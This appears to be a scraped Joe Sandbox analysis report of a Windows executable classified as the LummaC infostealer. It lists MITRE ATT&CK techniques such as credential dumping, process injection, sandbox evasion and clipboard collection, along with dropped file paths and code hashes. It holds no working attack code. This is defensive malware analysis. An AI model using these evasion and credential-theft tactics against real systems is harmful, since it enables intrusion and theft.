Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 7b199de2f989debcc4a4022b4ed0b102ff98f00a7cfabb0fa2c19a652ff94001
Instruction ID: 13248204af1a8f994db5435fb286a4db049689d033664cf5a154c6532e04440e
Opcode Fuzzy Hash: 7b199de2f989debcc4a4022b4ed0b102ff98f00a7cfabb0fa2c19a652ff94001
Instruction Fuzzy Hash: 8D41F831A01205AFDB618FE5C844BAA7FA5EF51330F245169FC559B1A1DBF09E00EBA0

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report [UPD]Intel_Unit.2.1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\y

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Alerts

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cloudy

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cloudy.cmd (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Enlarge

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Folk

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hence

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Illustrations

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Justify

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Kelly

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Lifetime

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Lovers

Windows Analysis Report
[UPD]Intel_Unit.2.1.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre